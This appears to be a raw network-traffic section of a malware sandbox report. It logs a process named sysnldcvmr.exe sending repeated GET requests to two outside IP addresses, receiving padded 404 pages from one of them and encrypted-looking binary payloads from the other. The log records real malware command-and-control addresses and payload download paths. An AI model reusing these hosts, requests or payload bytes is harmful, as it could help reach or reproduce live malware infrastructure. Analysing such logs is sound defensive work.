                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:54.300734997 CET728INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:56:54 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 564
                                                                                                                  Connection: keep-alive
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  26192.168.2.44991191.202.233.141801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:56:57.786437988 CET166OUTGET /1 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 91.202.233.141
                                                                                                                  Nov 30, 2024 01:56:59.115813017 CET728INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:56:58 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 564
                                                                                                                  Connection: keep-alive
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  27192.168.2.44991891.202.233.141801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:57:01.477612019 CET166OUTGET /2 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 91.202.233.141
                                                                                                                  Nov 30, 2024 01:57:02.821078062 CET728INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:57:02 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 564
                                                                                                                  Connection: keep-alive
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  28192.168.2.44993091.202.233.141801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:57:06.958869934 CET166OUTGET /3 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 91.202.233.141
                                                                                                                  Nov 30, 2024 01:57:08.358907938 CET728INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:57:08 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 564
                                                                                                                  Connection: keep-alive
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  29192.168.2.44994291.202.233.141801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:57:10.531789064 CET166OUTGET /4 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 91.202.233.141
                                                                                                                  Nov 30, 2024 01:57:11.851308107 CET728INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:57:11 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 564
                                                                                                                  Connection: keep-alive
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  30192.168.2.44994991.202.233.141801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:57:14.165716887 CET166OUTGET /5 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 91.202.233.141
                                                                                                                  Nov 30, 2024 01:57:15.528466940 CET728INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:57:15 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 564
                                                                                                                  Connection: keep-alive
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  31192.168.2.449961185.215.113.66801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:57:18.937022924 CET166OUTGET /1 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:20.251590967 CET1236INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:57:20 GMT
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Length: 8960
                                                                                                                  Last-Modified: Fri, 18 Oct 2024 09:57:02 GMT
                                                                                                                  Connection: keep-alive
                                                                                                                  ETag: "671230ee-2300"
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Data Raw: 24 ca 67 ed 72 35 5d b1 46 f1 4d 5b 99 be 6f 06 49 cd 95 a1 a2 11 e9 12 d3 c7 e2 35 85 45 62 e3 98 c2 b5 e8 b3 c3 bf 4c 36 2c 95 69 25 c7 6b 5a 0e 12 d1 d0 d9 38 1e 82 f6 e8 65 50 49 7c 94 06 0f 9b 93 3c f5 9e 69 71 94 f4 be ed 23 e0 11 fd 01 bb d6 0f 4f 40 35 bd 1b 55 7c 2a 7b 60 29 b2 bc d2 5d 82 48 ae a6 d6 e5 8d b7 02 e1 04 86 78 c0 95 2d 88 ea 8d be 64 52 7e 41 f0 7d 22 32 c1 9b e2 e3 14 80 83 e5 cb 20 2b 9c 28 aa 2a ce 52 d2 6d ab 02 db b7 dc 64 f9 a7 cf 21 e1 c6 28 b0 93 0a 24 b9 ec 35 1a 74 e4 b2 b9 a3 cc 46 d5 5d c9 bc 99 ad 3c ab 67 22 d8 c7 97 f2 56 04 28 31 7d 8c 5d 43 1a 88 ae 8d 05 a9 18 e4 b6 73 33 0c 16 37 36 f3 e3 88 97 26 e4 9a b3 ae 0b 49 63 11 8c bf 25 74 ec e5 68 fd 49 ed 80 62 bd f3 a4 fe e9 d1 52 28 e2 bc d0 e5 01 15 9e 7d b8 da 49 45 ae fd 1b 3c fc a8 8a 03 da 5d 9c c4 a1 43 c5 12 ab c3 c4 39 c0 a4 db f5 78 69 7c 06 e7 0e 81 91 f3 84 d2 da f5 d6 2f d6 12 f8 e0 09 3e 79 9d 8a 34 6d e0 ad 0b 33 f0 e1 68 4f 83 05 9c da a4 1f 3b 02 c3 e0 a4 3c 85 7c ab 99 35 b0 2c af 30 dd 74 41 [TRUNCATED]
                                                                                                                  Data Ascii: $gr5]FM[oI5EbL6,i%kZ8ePI|<iq#O@5U|*{`)]Hx-dR~A}"2 +(*Rmd!($5tF]<g"V(1}]Cs376&Ic%thIbR(}IE<]C9xi|/>y4m3hO;<|5,0tA`JNn;wesqT_:<fb7JH3& f1FGc&k,Jx+c`ws~(sFIT,5\)}-@.4>aue\v=IkB[Q2cLAlTrOUY*mj#uUP>Y{,Tk3h,v)PTK3_++mNP[qeG9f|[-&M~&14w_la/okwM_w^7Rgg%Tv}.Tp;dSuzFPHZIpz50g.`lK\V3tryl2R]?czmvo\ 0oN3aPV=BE\ _^hVf\*n$0qC7BQn.}c/Yd=G-TSx&zwi:,aoouHn8ZxF^=RnUTD9'
                                                                                                                  Nov 30, 2024 01:57:20.251672029 CET1236INData Raw: 93 57 98 e3 4c ac 64 50 69 d5 5e 60 5a 42 6a 17 d0 32 d7 d9 a3 9b b5 09 7a 01 5c d5 9a f5 b4 51 04 76 c6 6d 7e 0d de 69 d1 63 ff bd c2 b8 2c 86 13 5e 38 49 df c1 51 01 c0 d9 12 0c ba 3d d0 82 60 7b 3d ce 3a 38 e6 8c dc 07 d6 cd 79 a1 7c 5e 57 03
                                                                                                                  Data Ascii: WLdPi^`ZBj2z\Qvm~ic,^8IQ=`{=:8y|^WaO".m).=WP~TELBc*$7Rl-tjORq)X.Ji5@46n=yIb%InGlSz33(:&eGco%bA;0=X^
                                                                                                                  Nov 30, 2024 01:57:20.251735926 CET1236INData Raw: 25 31 0a 68 9c d8 ba 48 4c 90 81 b7 28 74 68 c8 16 f9 b8 2a c6 90 b0 6c 31 39 f2 bf 87 64 53 3a 32 36 df 01 fc e5 9e 18 72 19 69 e2 c7 ef 65 32 01 84 09 84 3b 94 85 f3 13 25 da 52 6f 20 19 c5 d9 dd d1 da 08 6e 35 b4 1e 41 c3 9d d9 91 9f 3f 3a 82
                                                                                                                  Data Ascii: %1hHL(th*l19dS:26rie2;%Ro n5A?:p"~ B'P?:/B1%yN[u::vukl/G^uh3vjZ0C,%Q 5my8e'+o{D82.p/{hp'SS/g)W
                                                                                                                  Nov 30, 2024 01:57:20.252127886 CET1236INData Raw: f3 0c 7b d7 90 9d 53 08 50 35 7a 7f 49 0b 16 9f ae a3 19 6a 1b 05 aa 5c 54 c6 1f 37 73 99 af 43 61 76 51 11 f2 eb 89 90 be 6d c9 bd 48 20 04 57 6d a3 8a 18 2a 96 64 13 63 ca 0d 0f 2d 28 7f 61 ff eb 80 38 1c 6f fd f6 59 64 de 2b f7 3d 76 66 94 76
                                                                                                                  Data Ascii: {SP5zIj\T7sCavQmH Wm*dc-(a8oYd+=vfvB"1C,/m#u?n8CpT}v#0]{&T;I]#zYw8OA{kK&GFMXFJ+I$?r-:Pw_gN/6p"]c{1 N
                                                                                                                  Nov 30, 2024 01:57:20.252149105 CET1236INData Raw: f3 c6 cf f8 95 24 43 84 1e 1f 9b 9c d9 67 06 dc 57 43 c0 ff d4 c9 b4 19 52 67 b0 40 5c 8f 00 ab 9d ff 39 47 b4 07 78 4f 3d ea 81 53 76 ad 4d 76 16 a5 b7 2e e5 b9 6d 89 3c f6 9f 00 cc a4 9a b7 cc 8f b1 36 f8 1a e3 38 6a df fd 09 9e 74 6f 47 14 bc
                                                                                                                  Data Ascii: $CgWCRg@\9GxO=SvMv.m<68jtoG M,"p-R6(=6;BS)2Mq#+dM1;oyAzm@!<Enk ?C=|9PednGDF%F-_!Y^uODIuH"oR^k=%
                                                                                                                  Nov 30, 2024 01:57:20.252162933 CET1236INData Raw: 94 04 da 8e d4 c0 98 3e 24 6d 01 7b 78 3d 57 2b 8b 06 77 55 2d 93 2b 04 bb 96 97 82 3d 6b 0f a9 c8 ef 2f e2 ce 5d 74 af 33 db 0c 35 3d f4 cd c7 65 c3 05 79 78 24 ce f4 a6 99 58 93 43 df f2 17 d2 12 2f 0c c1 a0 51 33 10 28 3d c5 a6 ec 61 a7 46 c8
                                                                                                                  Data Ascii: >$m{x=W+wU-+=k/]t35=eyx$XC/Q3(=aFS3RJr^{@[W\)9f>F}+V1*p0RQO{jwdL0_2}hGn[>q>a r{tVJ0sN]Q\-#6npc`
                                                                                                                  Nov 30, 2024 01:57:20.252839088 CET776INData Raw: d3 90 d1 fd d7 07 74 76 fe e7 1d df 46 a6 78 b3 3b 32 6d d7 75 d6 e6 a1 f8 ad 93 84 f2 7f 70 fa 89 4b 36 27 09 96 bc b1 c7 59 94 41 08 18 1d 5f 62 ee ed a0 2c 51 1b 21 fd cb 69 5e 5b 4f 79 a3 18 ee 3b 5f a3 09 af 9e 3b d6 57 f1 8e a7 51 41 72 bb
                                                                                                                  Data Ascii: tvFx;2mupK6'YA_b,Q!i^[Oy;_;WQAr_2H}/%~.6*rjk>DQgo_7}-)i&O%[u{zhaRIN9<[C&WK,+-27}#hH?FDr2Ey#s


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  32192.168.2.449970185.215.113.66801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:57:22.585227966 CET166OUTGET /2 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 185.215.113.66
                                                                                                                  Nov 30, 2024 01:57:24.080219030 CET1236INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:57:23 GMT
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Length: 10496
                                                                                                                  Last-Modified: Sun, 20 Oct 2024 18:34:00 GMT
                                                                                                                  Connection: keep-alive
                                                                                                                  ETag: "67154d18-2900"
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Data Raw: 13 e3 aa 7c f1 40 76 43 29 84 09 02 71 ae 39 fc df 9d fa 02 4b d8 7b 3e ae 0c e2 64 38 f9 d3 27 da 73 10 d1 ca f9 f2 4a f8 ad aa 12 e8 fa c9 50 6e f5 a1 6b 88 56 c2 7a 1f 17 e8 40 57 00 b2 8f df 4c 7b e3 14 75 47 bf 27 47 31 bb 43 4c 8e e7 b4 40 14 db 1d 3c 42 cc e1 36 dc d3 3b 91 3e 68 4d 15 e2 5c e6 98 da 7c 77 03 42 8c 76 ca a5 9a 81 db a1 ec 75 f2 84 a2 67 09 f0 c5 b4 4f 58 86 25 fc 20 b3 68 fa 72 39 3a 7c e0 1b f5 e8 b0 73 b6 f8 3c 81 36 fa 29 81 67 e8 ee 34 47 6c 59 b9 7f 18 32 42 66 14 35 b3 8d e2 41 8d e5 92 2b 47 1f c0 93 b3 28 d8 54 2d 6f 45 f1 c3 5a cf 49 32 33 d3 7b ac a8 27 33 c1 c9 e0 29 60 f9 b3 d3 5e 65 37 6a 7a 2f 4d 24 73 1b 93 bb fa 91 d2 34 ce 9b 19 db d6 2a 31 36 f0 a2 ab 92 6d 08 d9 66 72 6e 07 c5 44 44 2c 9e af ae ce d3 fb 57 61 28 cd 32 90 44 0e c3 39 95 a9 ab 17 e4 0d 16 a5 f0 c2 e3 78 c3 de e1 fa ff 86 d7 ae ab 06 ba 5a 6b 34 44 61 15 d3 b1 85 29 3f 83 f4 5f 68 10 ed 8d d7 73 41 11 b6 57 f3 ed 02 fa a4 42 32 ff 99 d6 ea 0a 63 48 51 ba 54 b5 00 01 83 3d 9e bb 55 dd 93 1c e5 [TRUNCATED]
                                                                                                                  Data Ascii: |@vC)q9K{>d8'sJPnkVz@WL{uG'G1CL@<B6;>hM\|wBvugOX% hr9:|s<6)g4GlY2Bf5A+G(T-oEZI23{'3)`^e7jz/M$s4*16mfrnDD,Wa(2D9xZk4Da)?_hsAWB2cHQT=U@3}!YGCX{ 4"&h0.'xu#c|gL0)cM]oL{:En:?|_XPQ@ 3.o)ua[I+fZM% ]2uz_Gwt0bFaMTd2Y&TMXP}+OpQEo6R;P>8`2'"~CZ_,2g $l"x:h;H`$-6_-eC?6T=qL3&fG)WG@6X~%X%RCh?R].fbU!PHh"Rj,dk.e\~hn(,G<u16tlw;p;yrSC_M6XhtG7zsHP,e_ddcn^M+ct\0jr>;_nq>xezw
                                                                                                                  Nov 30, 2024 01:57:24.080235958 CET1236INData Raw: b6 6f 0a 0a 83 25 6b 6b 77 fa e4 46 67 eb d9 41 2f aa 63 53 82 83 51 d9 2f 3d 63 6a 82 33 0b 6f 95 13 e1 9f 36 1b ba cb fb f5 6f 57 bb 40 bd 1d a5 c1 57 98 12 18 b1 98 2c ff 21 39 d5 d8 8c 8b 48 74 d5 8a 79 fc c5 75 bb aa e4 d3 c1 a0 97 29 d7 96
                                                                                                                  Data Ascii: o%kkwFgA/cSQ/=cj3o6oW@W,!9Htyu)PU:vO'8O>*B aw'&iEpRaMZ|3Fk<lQ;GbPMlh5}8m;ajW,N7&QK
                                                                                                                  Nov 30, 2024 01:57:24.080249071 CET248INData Raw: 63 34 74 b5 c2 9f e6 cf 24 40 6d 6d 39 94 34 21 a1 59 32 49 93 8d 45 6f 16 41 e3 3e fb e9 ec 01 f9 89 40 75 7d 84 c1 29 99 2e 8f f9 01 1b d7 e2 f5 ea f5 37 7e 95 c0 87 7f d4 e2 e3 b8 2c a3 95 7b 43 15 a1 69 fe 92 c8 13 e2 7f 5f 3b 68 4b fa 25 e1
                                                                                                                  Data Ascii: c4t$@mm94!Y2IEoA>@u}).7~,{Ci_;hK%D&kuY'p=/a:NTtKu"1X[8Ibdym-*|+>a`<Z!%| 4&[+usL^etpuu);Xb<>M\
